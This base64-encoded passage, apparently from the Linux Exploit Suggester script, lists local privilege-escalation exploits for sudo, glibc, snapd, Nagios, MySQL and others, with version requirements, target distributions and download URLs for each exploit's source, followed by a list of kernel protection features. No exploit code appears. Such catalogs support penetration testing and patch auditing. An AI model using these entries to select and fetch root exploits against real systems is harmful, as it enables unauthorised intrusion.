ZGI6IDQwNDg4CmF1dGhvcjogRGF3aWQgR29sdW5za2kKQ29tbWVudHM6IEFmZmVjdHMgb25seSBSZWRIYXQtYmFzZWQgZGlzdHJvcwpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNi02NjYzLENWRS0yMDE2LTY2NjR8Q1ZFLTIwMTYtNjY2Ml0ke3R4dHJzdH0gbXlzcWwtZXhwbG9pdC1jaGFpbgpSZXFzOiBwa2c9bXlzcWwtc2VydmVyfG1hcmlhZGItc2VydmVyLHZlcjw1LjUuNTIKVGFnczogdWJ1bnR1PTE2LjA0LjEKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vbGVnYWxoYWNrZXJzLmNvbS9hZHZpc29yaWVzL015U1FMLU1hcmlhLVBlcmNvbmEtUHJpdkVzY1JhY2UtQ1ZFLTIwMTYtNjY2My01NjE2LUV4cGxvaXQuaHRtbApzcmMtdXJsOiBodHRwOi8vbGVnYWxoYWNrZXJzLmNvbS9leHBsb2l0cy9DVkUtMjAxNi02NjYzL215c3FsLXByaXZlc2MtcmFjZS5jCmV4cGxvaXQtZGI6IDQwNjc4CmF1dGhvcjogRGF3aWQgR29sdW5za2kKQ29tbWVudHM6IEFsc28gTWFyaWFEQiB2ZXI8MTAuMS4xOCBhbmQgdmVyPDEwLjAuMjggYWZmZWN0ZWQKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTYtOTU2Nl0ke3R4dHJzdH0gbmFnaW9zLXJvb3QtcHJpdmVzYwpSZXFzOiBwa2c9bmFnaW9zLHZlcjw0LjIuNApUYWdzOgpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9sZWdhbGhhY2tlcnMuY29tL2Fkdmlzb3JpZXMvTmFnaW9zLUV4cGxvaXQtUm9vdC1Qcml2RXNjLUNWRS0yMDE2LTk1NjYuaHRtbApzcmMtdXJsOiBodHRwczovL2xlZ2FsaGFja2Vycy5jb20vZXhwbG9pdHMvQ1ZFLTIwMTYtOTU2Ni9uYWdpb3Mtcm9vdC1wcml2ZXNjLnNoCmV4cGxvaXQtZGI6IDQwOTIxCmF1dGhvcjogRGF3aWQgR29sdW5za2kKQ29tbWVudHM6IEFsbG93cyBwcml2IGVzY2FsYXRpb24gZnJvbSBuYWdpb3MgdXNlciBvciBuYWdpb3MgZ3JvdXAKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTctMDM1OF0ke3R4dHJzdH0gbnRmcy0zZy1tb2Rwcm9iZQpSZXFzOiBwa2c9bnRmcy0zZyx2ZXI8MjAxNy40ClRhZ3M6IHVidW50dT0xNi4wNHtudGZzLTNnOjIwMTUuMy4xNEFSLjEtMWJ1aWxkMX0sZGViaWFuPTcuMHtudGZzLTNnOjIwMTIuMS4xNUFSLjUtMi4xK2RlYjd1Mn0sZGViaWFuPTguMHtudGZzLTNnOjIwMTQuMi4xNUFSLjItMStkZWI4dTJ9ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL2J1Z3MuY2hyb21pdW0ub3JnL3AvcHJvamVjdC16ZXJvL2lzc3Vlcy9kZXRhaWw/aWQ9MTA3MgpzcmMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vb2ZmZW5zaXZlLXNlY3VyaXR5L2V4cGxvaXQtZGF0YWJhc2UtYmluLXNwbG9pdHMvcmF3L21hc3Rlci9iaW4tc3Bsb2l0cy80MTM1Ni56aXAKZXhwbG9pdC1kYjogNDEzNTYKYXV0aG9yOiBKYW5uIEhvcm4KQ29tbWVudHM6IERpc3Ryb3MgdXNlIG93biB2ZXJzaW9uaW5nIHNjaGVtZS4gTWFudWFsIHZlcmlmaWNhdGlvbiBuZWVkZWQuIExpbnV4IGhlYWRlcnMgbXVzdCBiZSBpbnN0YWxsZWQuIFN5c3RlbSBtdXN0IGhhdmUgYXQgbGVhc3QgdHdvIENQVSBjb3Jlcy4KRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTctNTg5OV0ke3R4dHJzdH0gcy1uYWlsLXByaXZnZXQKUmVxczogcGtnPXMtbmFpbCx2ZXI8MTQuOC4xNgpUYWdzOiB1YnVudHU9MTYuMDQsbWFuamFybz0xNi4xMApSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly93d3cub3BlbndhbGwuY29tL2xpc3RzL29zcy1zZWN1cml0eS8yMDE3LzAxLzI3LzcKc3JjLXVybDogaHR0cHM6Ly93d3cub3BlbndhbGwuY29tL2xpc3RzL29zcy1zZWN1cml0eS8yMDE3LzAxLzI3LzcvMQpleHQtdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vYmNvbGVzL2xvY2FsLWV4cGxvaXRzL21hc3Rlci9DVkUtMjAxNy01ODk5L2V4cGxvaXQuc2gKYXV0aG9yOiB3YXBpZmxhcGkgKG9yZ2luYWwgZXhwbG9pdCBhdXRob3IpOyBCcmVuZGFuIENvbGVzIChhdXRob3Igb2YgZXhwbG9pdCB1cGRhdGUgYXQgJ2V4dC11cmwnKQpDb21tZW50czogRGlzdHJvcyB1c2Ugb3duIHZlcnNpb25pbmcgc2NoZW1lLiBNYW51YWwgdmVyaWZpY2F0aW9uIG5lZWRlZC4KRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTctMTAwMDM2N10ke3R4dHJzdH0gU3Vkb2VyLXRvLXJvb3QKUmVxczogcGtnPXN1ZG8sdmVyPD0xLjguMjAsY21kOlsgLWYgL3Vzci9zYmluL2dldGVuZm9yY2UgXQpUYWdzOiBSSEVMPTd7c3VkbzoxLjguNnA3fQpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly93d3cuc3Vkby53cy9hbGVydHMvbGludXhfdHR5Lmh0bWwKc3JjLXVybDogaHR0cHM6Ly93d3cucXVhbHlzLmNvbS8yMDE3LzA1LzMwL2N2ZS0yMDE3LTEwMDAzNjcvbGludXhfc3Vkb19jdmUtMjAxNy0xMDAwMzY3LmMKZXhwbG9pdC1kYjogNDIxODMKYXV0aG9yOiBRdWFseXMKQ29tbWVudHM6IE5lZWRzIHRvIGJlIHN1ZG9lci4gV29ya3Mgb25seSBvbiBTRUxpbnV4IGVuYWJsZWQgc3lzdGVtcwpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNy0xMDAwMzY3XSR7dHh0cnN0fSBzdWRvcHduClJlcXM6IHBrZz1zdWRvLHZlcjw9MS44LjIwLGNtZDpbIC1mIC91c3Ivc2Jpbi9nZXRlbmZvcmNlIF0KVGFnczoKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3LnN1ZG8ud3MvYWxlcnRzL2xpbnV4X3R0eS5odG1sCnNyYy11cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9jMGQzejNyMC9zdWRvLUNWRS0yMDE3LTEwMDAzNjcvbWFzdGVyL3N1ZG9wd24uYwpleHBsb2l0LWRiOgphdXRob3I6IGMwZDN6M3IwCkNvbW1lbnRzOiBOZWVkcyB0byBiZSBzdWRvZXIuIFdvcmtzIG9ubHkgb24gU0VMaW51eCBlbmFibGVkIHN5c3RlbXMKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTctMTAwMDM2NixDVkUtMjAxNy0xMDAwMzcwXSR7dHh0cnN0fSBsaW51eF9sZHNvX2h3Y2FwClJlcXM6IHBrZz1nbGliY3xsaWJjNix2ZXI8PTIuMjUseDg2ClRhZ3M6ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL3d3dy5xdWFseXMuY29tLzIwMTcvMDYvMTkvc3RhY2stY2xhc2gvc3RhY2stY2xhc2gudHh0CnNyYy11cmw6IGh0dHBzOi8vd3d3LnF1YWx5cy5jb20vMjAxNy8wNi8xOS9zdGFjay1jbGFzaC9saW51eF9sZHNvX2h3Y2FwLmMKZXhwbG9pdC1kYjogNDIyNzQKYXV0aG9yOiBRdWFseXMKQ29tbWVudHM6IFVzZXMgIlN0YWNrIENsYXNoIiB0ZWNobmlxdWUsIHdvcmtzIGFnYWluc3QgbW9zdCBTVUlELXJvb3QgYmluYXJpZXMKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTctMTAwMDM2NixDVkUtMjAxNy0xMDAwMzcxXSR7dHh0cnN0fSBsaW51eF9sZHNvX2R5bmFtaWMKUmVxczogcGtnPWdsaWJjfGxpYmM2LHZlcjw9Mi4yNSx4ODYKVGFnczogZGViaWFuPTl8MTAsdWJ1bnR1PTE0LjA0LjV8MTYuMDQuMnwxNy4wNCxmZWRvcmE9MjN8MjR8MjUKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3LnF1YWx5cy5jb20vMjAxNy8wNi8xOS9zdGFjay1jbGFzaC9zdGFjay1jbGFzaC50eHQKc3JjLXVybDogaHR0cHM6Ly93d3cucXVhbHlzLmNvbS8yMDE3LzA2LzE5L3N0YWNrLWNsYXNoL2xpbnV4X2xkc29fZHluYW1pYy5jCmV4cGxvaXQtZGI6IDQyMjc2CmF1dGhvcjogUXVhbHlzCkNvbW1lbnRzOiBVc2VzICJTdGFjayBDbGFzaCIgdGVjaG5pcXVlLCB3b3JrcyBhZ2FpbnN0IG1vc3QgU1VJRC1yb290IFBJRXMKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTctMTAwMDM2NixDVkUtMjAxNy0xMDAwMzc5XSR7dHh0cnN0fSBsaW51eF9sZHNvX2h3Y2FwXzY0ClJlcXM6IHBrZz1nbGliY3xsaWJjNix2ZXI8PTIuMjUseDg2XzY0ClRhZ3M6IGRlYmlhbj03Ljd8OC41fDkuMCx1YnVudHU9MTQuMDQuMnwxNi4wNC4yfDE3LjA0LGZlZG9yYT0yMnwyNSxjZW50b3M9Ny4zLjE2MTEKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3LnF1YWx5cy5jb20vMjAxNy8wNi8xOS9zdGFjay1jbGFzaC9zdGFjay1jbGFzaC50eHQKc3JjLXVybDogaHR0cHM6Ly93d3cucXVhbHlzLmNvbS8yMDE3LzA2LzE5L3N0YWNrLWNsYXNoL2xpbnV4X2xkc29faHdjYXBfNjQuYwpleHBsb2l0LWRiOiA0MjI3NQphdXRob3I6IFF1YWx5cwpDb21tZW50czogVXNlcyAiU3RhY2sgQ2xhc2giIHRlY2huaXF1ZSwgd29ya3MgYWdhaW5zdCBtb3N0IFNVSUQtcm9vdCBiaW5hcmllcwpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxNy0xMDAwMzcwLENWRS0yMDE3LTEwMDAzNzFdJHt0eHRyc3R9IGxpbnV4X29mZnNldDJsaWIKUmVxczogcGtnPWdsaWJjfGxpYmM2LHZlcjw9Mi4yNSx4ODYKVGFnczoKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3LnF1YWx5cy5jb20vMjAxNy8wNi8xOS9zdGFjay1jbGFzaC9zdGFjay1jbGFzaC50eHQKc3JjLXVybDogaHR0cHM6Ly93d3cucXVhbHlzLmNvbS8yMDE3LzA2LzE5L3N0YWNrLWNsYXNoL2xpbnV4X29mZnNldDJsaWIuYwpleHBsb2l0LWRiOiA0MjI3MwphdXRob3I6IFF1YWx5cwpDb21tZW50czogVXNlcyAiU3RhY2sgQ2xhc2giIHRlY2huaXF1ZQpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxOC0xMDAwMDAxXSR7dHh0cnN0fSBSYXRpb25hbExvdmUKUmVxczogcGtnPWdsaWJjfGxpYmM2LHZlcjwyLjI3LENPTkZJR19VU0VSX05TPXksc3lzY3RsOmtlcm5lbC51bnByaXZpbGVnZWRfdXNlcm5zX2Nsb25lPT0xLHg4Nl82NApUYWdzOiBkZWJpYW49OXtsaWJjNjoyLjI0LTExK2RlYjl1MX0sdWJ1bnR1PTE2LjA0LjN7bGliYzY6Mi4yMy0wdWJ1bnR1OX0KUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3LmhhbGZkb2cubmV0L1NlY3VyaXR5LzIwMTcvTGliY1JlYWxwYXRoQnVmZmVyVW5kZXJmbG93LwpzcmMtdXJsOiBodHRwczovL3d3dy5oYWxmZG9nLm5ldC9TZWN1cml0eS8yMDE3L0xpYmNSZWFscGF0aEJ1ZmZlclVuZGVyZmxvdy9SYXRpb25hbExvdmUuYwpDb21tZW50czoga2VybmVsLnVucHJpdmlsZWdlZF91c2VybnNfY2xvbmU9MSByZXF1aXJlZApiaW4tdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vcmFwaWQ3L21ldGFzcGxvaXQtZnJhbWV3b3JrL21hc3Rlci9kYXRhL2V4cGxvaXRzL2N2ZS0yMDE4LTEwMDAwMDEvUmF0aW9uYWxMb3ZlCmV4cGxvaXQtZGI6IDQzNzc1CmF1dGhvcjogaGFsZmRvZwpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxOC0xMDkwMF0ke3R4dHJzdH0gdnBuY19wcml2ZXNjLnB5ClJlcXM6IHBrZz1uZXR3b3JrbWFuYWdlci12cG5jfG5ldHdvcmstbWFuYWdlci12cG5jLHZlcjwxLjIuNgpUYWdzOiB1YnVudHU9MTYuMDR7bmV0d29yay1tYW5hZ2VyLXZwbmM6MS4xLjkzLTF9LGRlYmlhbj05LjB7bmV0d29yay1tYW5hZ2VyLXZwbmM6MS4yLjQtNH0sbWFuamFybz0xNwpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9wdWxzZXNlY3VyaXR5LmNvLm56L2Fkdmlzb3JpZXMvTk0tVlBOQy1Qcml2ZXNjCnNyYy11cmw6IGh0dHBzOi8vYnVnemlsbGEubm92ZWxsLmNvbS9hdHRhY2htZW50LmNnaT9pZD03NzkxMTAKZXhwbG9pdC1kYjogNDUzMTMKYXV0aG9yOiBEZW5pcyBBbmR6YWtvdmljCkNvbW1lbnRzOiBEaXN0cm9zIHVzZSBvd24gdmVyc2lvbmluZyBzY2hlbWUuIE1hbnVhbCB2ZXJpZmljYXRpb24gbmVlZGVkLgpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxOC0xNDY2NV0ke3R4dHJzdH0gcmFwdG9yX3hvcmd5ClJlcXM6IHBrZz14b3JnLXgxMS1zZXJ2ZXItWG9yZyxjbWQ6WyAtdSAvdXNyL2Jpbi9Yb3JnIF0KVGFnczogY2VudG9zPTcuNApSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly93d3cuc2VjdXJlcGF0dGVybnMuY29tLzIwMTgvMTAvY3ZlLTIwMTgtMTQ2NjUteG9yZy14LXNlcnZlci5odG1sCmV4cGxvaXQtZGI6IDQ1OTIyCmF1dGhvcjogcmFwdG9yCkNvbW1lbnRzOiBYLk9yZyBTZXJ2ZXIgYmVmb3JlIDEuMjAuMyBpcyB2dWxuZXJhYmxlLiBEaXN0cm9zIHVzZSBvd24gdmVyc2lvbmluZyBzY2hlbWUuIE1hbnVhbCB2ZXJpZmljYXRpb24gbmVlZGVkLgpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxOS03MzA0XSR7dHh0cnN0fSBkaXJ0eV9zb2NrClJlcXM6IHBrZz1zbmFwZCx2ZXI8Mi4zNyxjbWQ6WyAtUyAvcnVuL3NuYXBkLnNvY2tldCBdClRhZ3M6IHVidW50dT0xOC4xMCxtaW50PTE5ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL2luaXRibG9nLmNvbS8yMDE5L2RpcnR5LXNvY2svCmV4cGxvaXQtZGI6IDQ2MzYxCmV4cGxvaXQtZGI6IDQ2MzYyCnNyYy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2svYXJjaGl2ZS9tYXN0ZXIuemlwCmF1dGhvcjogSW5pdFN0cmluZwpDb21tZW50czogRGlzdHJvcyB1c2Ugb3duIHZlcnNpb25pbmcgc2NoZW1lLiBNYW51YWwgdmVyaWZpY2F0aW9uIG5lZWRlZC4KRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTktMTAxNDldJHt0eHRyc3R9IHJhcHRvcl9leGltX3dpegpSZXFzOiBwa2c9ZXhpbXxleGltNCx2ZXI+PTQuODcsdmVyPD00LjkxClRhZ3M6ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL3d3dy5xdWFseXMuY29tLzIwMTkvMDYvMDUvY3ZlLTIwMTktMTAxNDkvcmV0dXJuLXdpemFyZC1yY2UtZXhpbS50eHQKZXhwbG9pdC1kYjogNDY5OTYKYXV0aG9yOiByYXB0b3IKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTktMTIxODFdJHt0eHRyc3R9IFNlcnYtVSBGVFAgU2VydmVyClJlcXM6IGNtZDpbIC11IC91c3IvbG9jYWwvU2Vydi1VL1NlcnYtVSBdClRhZ3M6IGRlYmlhbj05ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL2Jsb2cudmFzdGFydC5kZXYvMjAxOS8wNi9jdmUtMjAxOS0xMjE4MS1zZXJ2LXUtZXhwbG9pdC13cml0ZXVwLmh0bWwKZXhwbG9pdC1kYjogNDcwMDkKc3JjLXVybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2d1eXdoYXRhZ3V5L0NWRS0yMDE5LTEyMTgxL21hc3Rlci9zZXJ2dS1wZS1jdmUtMjAxOS0xMjE4MS5jCmV4dC11cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9iY29sZXMvbG9jYWwtZXhwbG9pdHMvbWFzdGVyL0NWRS0yMDE5LTEyMTgxL1NVcm9vdAphdXRob3I6IEd1eSBMZXZpbiAob3JnaW5hbCBleHBsb2l0IGF1dGhvcik7IEJyZW5kYW4gQ29sZXMgKGF1dGhvciBvZiBleHBsb2l0IHVwZGF0ZSBhdCAnZXh0LXVybCcpCkNvbW1lbnRzOiBNb2RpZmllZCB2ZXJzaW9uIGF0ICdleHQtdXJsJyB1c2VzIGJhc2ggZXhlYyB0ZWNobmlxdWUsIHJhdGhlciB0aGFuIGNvbXBpbGluZyB3aXRoIGdjYy4KRU9GCikKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxOS0xODg2Ml0ke3R4dHJzdH0gR05VIE1haWx1dGlscyAyLjAgPD0gMy43IG1haWRhZyB1cmwgbG9jYWwgcm9vdCAoQ1ZFLTIwMTktMTg4NjIpClJlcXM6IGNtZDpbIC11IC91c3IvbG9jYWwvc2Jpbi9tYWlkYWcgXQpUYWdzOiAKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3Lm1pa2UtZ3VhbHRpZXJpLmNvbS9wb3N0cy9maW5kaW5nLWEtZGVjYWRlLW9sZC1mbGF3LWluLWdudS1tYWlsdXRpbHMKZXh0LXVybDogaHR0cHM6Ly9naXRodWIuY29tL2Jjb2xlcy9sb2NhbC1leHBsb2l0cy9yYXcvbWFzdGVyL0NWRS0yMDE5LTE4ODYyL2V4cGxvaXQuY3Jvbi5zaApzcmMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vYmNvbGVzL2xvY2FsLWV4cGxvaXRzL3Jhdy9tYXN0ZXIvQ1ZFLTIwMTktMTg4NjIvZXhwbG9pdC5sZHByZWxvYWQuc2gKYXV0aG9yOiBiY29sZXMKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTktMTg2MzRdJHt0eHRyc3R9IHN1ZG8gcHdmZWVkYmFjawpSZXFzOiBwa2c9c3Vkbyx2ZXI8MS44LjMxClRhZ3M6IG1pbnQ9MTkKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vZHlsYW5rYXR6LmNvbS9BbmFseXNpcy1vZi1DVkUtMjAxOS0xODYzNC8Kc3JjLXVybDogaHR0cHM6Ly9naXRodWIuY29tL3NhbGVlbXJhc2hpZC9zdWRvLWN2ZS0yMDE5LTE4NjM0L3Jhdy9tYXN0ZXIvZXhwbG9pdC5jCmF1dGhvcjogc2FsZWVtcmFzaGlkCkNvbW1lbnRzOiBzdWRvIGNvbmZpZ3VyYXRpb24gcmVxdWlyZXMgcHdmZWVkYmFjayB0byBiZSBlbmFibGVkLgpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAyMC05NDcwXSR7dHh0cnN0fSBXaW5nIEZUUCBTZXJ2ZXIgPD0gNi4yLjUgTFBFClJlcXM6IGNtZDpbIC14IC9ldGMvaW5pdC5kL3dmdHBzZXJ2ZXIgXQpUYWdzOiB1YnVudHU9MTgKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3Lmhvb3BlcmxhYnMueHl6L2Rpc2Nsb3N1cmVzL2N2ZS0yMDIwLTk0NzAucGhwCnNyYy11cmw6IGh0dHBzOi8vd3d3Lmhvb3BlcmxhYnMueHl6L2Rpc2Nsb3N1cmVzL2N2ZS0yMDIwLTk0NzAuc2gKZXhwbG9pdC1kYjogNDgxNTQKYXV0aG9yOiBDYXJ5IENvb3BlcgpDb21tZW50czogUmVxdWlyZXMgYW4gYWRtaW5pc3RyYXRvciB0byBsb2dpbiB2aWEgdGhlIHdlYiBpbnRlcmZhY2UuCkVPRgopCgpFWFBMT0lUU19VU0VSU1BBQ0VbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDIxLTMxNTZdJHt0eHRyc3R9IHN1ZG8gQmFyb24gU2FtZWRpdApSZXFzOiBwa2c9c3Vkbyx2ZXI8MS45LjVwMgpUYWdzOiBtaW50PTE5LHVidW50dT0xOHwyMCwgZGViaWFuPTEwClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL3d3dy5xdWFseXMuY29tLzIwMjEvMDEvMjYvY3ZlLTIwMjEtMzE1Ni9iYXJvbi1zYW1lZGl0LWhlYXAtYmFzZWQtb3ZlcmZsb3ctc3Vkby50eHQKc3JjLXVybDogaHR0cHM6Ly9jb2RlbG9hZC5naXRodWIuY29tL2JsYXN0eS9DVkUtMjAyMS0zMTU2L3ppcC9tYWluCmF1dGhvcjogYmxhc3R5CkVPRgopCgpFWFBMT0lUU19VU0VSU1BBQ0VbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDIxLTMxNTZdJHt0eHRyc3R9IHN1ZG8gQmFyb24gU2FtZWRpdCAyClJlcXM6IHBrZz1zdWRvLHZlcjwxLjkuNXAyClRhZ3M6IGNlbnRvcz02fDd8OCx1YnVudHU9MTR8MTZ8MTd8MTh8MTl8MjAsIGRlYmlhbj05fDEwClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL3d3dy5xdWFseXMuY29tLzIwMjEvMDEvMjYvY3ZlLTIwMjEtMzE1Ni9iYXJvbi1zYW1lZGl0LWhlYXAtYmFzZWQtb3ZlcmZsb3ctc3Vkby50eHQKc3JjLXVybDogaHR0cHM6Ly9jb2RlbG9hZC5naXRodWIuY29tL3dvcmF3aXQvQ1ZFLTIwMjEtMzE1Ni96aXAvbWFpbgphdXRob3I6IHdvcmF3aXQKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTctNTYxOF0ke3R4dHJzdH0gc2V0dWlkIHNjcmVlbiB2NC41LjAgTFBFClJlcXM6IHBrZz1zY3JlZW4sdmVyPT00LjUuMApUYWdzOiAKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vc2VjbGlzdHMub3JnL29zcy1zZWMvMjAxNy9xMS8xODQKZXhwbG9pdC1kYjogaHR0cHM6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvNDExNTQKRU9GCikKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCiMjIHNlY3VyaXR5IHJlbGF0ZWQgSFcva2VybmVsIGZlYXR1cmVzCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCm49MAoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKc2VjdGlvbjogTWFpbmxpbmUga2VybmVsIHByb3RlY3Rpb24gbWVjaGFuaXNtczoKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IEtlcm5lbCBQYWdlIFRhYmxlIElzb2xhdGlvbiAoUFRJKSBzdXBwb3J0CmF2YWlsYWJsZTogdmVyPj00LjE1CmVuYWJsZWQ6IGNtZDpncmVwIC1FcWkgJ1xzcHRpJyAvcHJvYy9jcHVpbmZvCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvcHRpLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBHQ0Mgc3RhY2sgcHJvdGVjdG9yIHN1cHBvcnQKYXZhaWxhYmxlOiBDT05GSUdfSEFWRV9TVEFDS1BST1RFQ1RPUj15CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvc3RhY2twcm90ZWN0b3ItcmVndWxhci5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogR0NDIHN0YWNrIHByb3RlY3RvciBTVFJPTkcgc3VwcG9ydAphdmFpbGFibGU6IENPTkZJR19TVEFDS1BST1RFQ1RPUl9TVFJPTkc9eSx2ZXI+PTMuMTQKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9zdGFja3Byb3RlY3Rvci1zdHJvbmcubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IExvdyBhZGRyZXNzIHNwYWNlIHRvIHByb3RlY3QgZnJvbSB1c2VyIGFsbG9jYXRpb24KYXZhaWxhYmxlOiBDT05GSUdfREVGQVVMVF9NTUFQX01JTl9BRERSPVswLTldKwplbmFibGVkOiBzeXNjdGw6dm0ubW1hcF9taW5fYWRkciE9MAphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL21tYXBfbWluX2FkZHIubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IFByZXZlbnQgdXNlcnMgZnJvbSB1c2luZyBwdHJhY2UgdG8gZXhhbWluZSB0aGUgbWVtb3J5IGFuZCBzdGF0ZSBvZiB0aGVpciBwcm9jZXNzZXMKYXZhaWxhYmxlOiBDT05GSUdfU0VDVVJJVFlfWUFNQT15CmVuYWJsZWQ6IHN5c2N0bDprZXJuZWwueWFtYS5wdHJhY2Vfc2NvcGUhPTAKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy95YW1hX3